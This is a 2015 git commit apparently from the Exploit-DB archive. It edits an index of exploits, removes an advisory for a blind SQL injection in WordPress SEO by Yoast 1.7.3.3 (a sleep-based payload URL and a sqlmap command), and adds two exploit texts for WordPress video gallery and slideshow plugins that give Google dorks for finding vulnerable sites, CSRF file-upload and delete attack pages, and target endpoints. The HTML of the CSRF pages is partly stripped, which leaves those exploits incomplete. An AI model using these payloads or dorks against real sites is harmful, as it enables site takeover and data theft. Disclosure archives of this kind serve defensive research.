From f7fce69883ae06d4e851b124a8313c8bcea08dab Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 6 Apr 2015 08:36:30 +0000 Subject: [PATCH] DB: 2015-04-06 2 new exploits --- files.csv | 4 +- platforms/aix/dos/36413.txt | 74 ------------------------------ platforms/php/webapps/36610.txt | 61 +++++++++++++++++++++++++ platforms/php/webapps/36612.txt | 81 +++++++++++++++++++++++++++++++++ 4 files changed, 145 insertions(+), 75 deletions(-) delete mode 100755 platforms/aix/dos/36413.txt create mode 100755 platforms/php/webapps/36610.txt create mode 100755 platforms/php/webapps/36612.txt diff --git a/files.csv b/files.csv index 2b187216e..b235e4d10 100755 --- a/files.csv +++ b/files.csv @@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0 -36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0 +36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 @@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 +36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt deleted file mode 100755 index c694dbdf3..000000000 --- a/platforms/aix/dos/36413.txt +++ /dev/null @@ -1,74 +0,0 @@ -Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection -Version/s Tested: 1.7.3.3 -Patched Version: 1.7.4 -CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) -CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) -WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 - -Description: - -WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used -to improve the Search Engine Optimization (SEO) of WordPress sites. The -latest version at the time of writing (1.7.3.3) has been found to be -affected by two authenticated (admin, editor or author user) Blind SQL -Injection vulnerabilities. The plugin has more than one million downloads -according to WordPress. - -Technical Description: - -The authenticated Blind SQL Injection vulnerability can be found within the -'admin/class-bulk-editor-list-table.php' file. The orderby and order GET -parameters are not sufficiently sanitised before being used within a SQL -query. - -Line 529: - -$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( -$_GET['orderby'] ) ) : 'post_title'; - -Line 533: - -order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) ); - -If the GET orderby parameter value is not empty it will pass its value -through WordPess's own esc_sql() function. According to WordPress this -function 'Prepares a string for use as an SQL query. A glorified -addslashes() that works with arrays.'. However, this is not sufficient to -prevent SQL Injection as can be seen from our Proof of Concept. - -Proof of Concept (PoC): - -The following GET request will cause the SQL query to execute and sleep for -10 seconds if clicked on as an authenticated admin, editor or author user. - -http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc - -Using SQLMap: - -python sqlmap.py -u " -http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" ---batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; -wordpress_logged_in_9dee67...;" - -Impact: - -As there is no anti-CSRF protection a remote unauthenticated attacker could -use this vulnerability to execute arbitrary SQL queries on the victim -WordPress web site by enticing an authenticated admin, editor or author -user to click on a specially crafted link or visit a page they control. - -One possible attack scenario would be an attacker adding their own -administrative user to the target WordPress site, allowing them to -compromise the entire web site. - -Timeline: - -March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst -(WPScan Team - Dewhurst Security). -March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team). -March 10th 2015 - 20:00 GMT: Vendor contacted via email. -March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave -expected patch timeline. -March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches -this issue. -March 11th 2015 - 12:30 GMT: Advisory released. \ No newline at end of file diff --git a/platforms/php/webapps/36610.txt b/platforms/php/webapps/36610.txt new file mode 100755 index 000000000..7ae0ca242 --- /dev/null +++ b/platforms/php/webapps/36610.txt @@ -0,0 +1,61 @@ +# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload +# Google Dork: inurl:/wp-content/plugins/contus-video-gallery +# Date: 31 March 2015 +# Exploit Author: Divya +# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/ +# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip +# Version: 2.8 +# Tested on: Windows, Linux +# CVE : None + +CSRF File Upload Exploit Code: + + + + +WP Plugin CSRF File Upload + + + +
+ +
+ + + + + + +Other CSRF vulnerable areas of application: +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=video + +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=image + +URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo +Data: myfile=[upload_file_details]&mode=srt \ No newline at end of file diff --git a/platforms/php/webapps/36612.txt b/platforms/php/webapps/36612.txt new file mode 100755 index 000000000..04844db88 --- /dev/null +++ b/platforms/php/webapps/36612.txt @@ -0,0 +1,81 @@ +# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities +# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/ +# Date: 2 April 2015 +# Exploit Author: Divya +# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/ +# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip +# Version: 1.0.3 +# Tested on: Windows, Linux +# CVE : None + +Delete operation using CSRF: + + +Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1 + + + CSRF Delete Operation + +
+ + + +
+ + + + +Arbitrary File Upload using CSRF: + + + WP CSRF File Upload + + +
+ +
+ + + + +Arbitrary File Upload (Authenticated): + +URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image + +The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server. + +Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/